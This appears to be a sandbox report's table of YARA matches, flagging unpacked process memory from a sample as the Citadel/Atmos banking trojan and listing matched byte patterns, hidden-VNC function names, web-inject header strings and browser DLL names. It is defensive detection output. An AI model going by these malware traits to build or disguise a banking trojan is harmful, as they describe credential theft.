23.0.UserOOBEBroker.exe.10000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 01 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 01 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 01 00
23.0.UserOOBEBroker.exe.10000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
22.0.SystemSettings.exe.f10000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
22.0.SystemSettings.exe.f10000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
22.0.SystemSettings.exe.f10000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
22.0.SystemSettings.exe.f10000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 F1 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 F1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 F1 00
22.0.SystemSettings.exe.f10000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
16.0.TextInputHost.exe.580000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
16.0.TextInputHost.exe.580000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
16.0.TextInputHost.exe.580000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
16.0.TextInputHost.exe.580000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 58 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 58 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 58 00
16.0.TextInputHost.exe.580000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
21.3.RuntimeBroker.exe.190000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
21.3.RuntimeBroker.exe.190000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
21.3.RuntimeBroker.exe.190000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
21.3.RuntimeBroker.exe.190000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 19 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 19 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 19 00
21.3.RuntimeBroker.exe.190000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0.3.services.png.exe.2590000.1.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
24.0.svchost.exe.fb0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
24.0.svchost.exe.fb0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
24.0.svchost.exe.fb0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
24.0.svchost.exe.fb0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 FB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 FB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 FB 00
24.0.svchost.exe.fb0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
24.3.svchost.exe.fb0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
24.3.svchost.exe.fb0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
24.3.svchost.exe.fb0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
24.3.svchost.exe.fb0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 FB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 FB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 FB 00
24.3.svchost.exe.fb0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
16.3.TextInputHost.exe.580000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
16.3.TextInputHost.exe.580000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
16.3.TextInputHost.exe.580000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
16.3.TextInputHost.exe.580000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 58 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 58 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 58 00
16.3.TextInputHost.exe.580000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
27.3.backgroundTaskHost.exe.e20000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
27.3.backgroundTaskHost.exe.e20000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
27.3.backgroundTaskHost.exe.e20000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
27.3.backgroundTaskHost.exe.e20000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 E2 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 E2 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 E2 00
